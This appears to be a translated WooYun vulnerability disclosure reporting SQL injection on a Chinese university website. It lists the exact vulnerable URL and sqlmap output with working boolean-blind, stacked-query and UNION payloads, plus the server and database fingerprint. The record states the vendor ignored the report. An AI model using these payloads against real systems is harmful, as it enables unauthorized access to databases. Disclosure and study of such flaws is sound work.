
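Vulnerability Summary

Bug ID: wooyun-2016-0178137

Title: SQL injection vulnerability in a site of Central South University of Forestry and Technology, exploitable via UNION

Vendor: Central South University of Forestry and Technology

Author: 路人甲

Submitted: 2016-02-24 09:47

Fix time: 2016-02-29 09:50

Publicly disclosed: 2016-02-29 09:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: The vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags: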



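Vulnerability Details

Disclosure status:

2016-02-24: Details have been sent to the vendor; awaiting the vendor's response
2016-02-29: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Detailed description: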

http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: departmentId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: departmentId=20 AND 6267=6267&key=GetProfessionComboboxJson
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: departmentId=20;WAITFOR DELAY '0:0:5'--&key=GetProfessionComboboxJson
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: departmentId=20 UNION ALL SELECT 18,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(69)+CHAR(77)+CHAR(100)+CHAR(83)+CHAR(85)+CHAR(88)+CHAR(73)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113),18-- &key=GetProfessionComboboxJson
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: zdzxwdata
[114 tables]

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2016-02-29 09:50

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None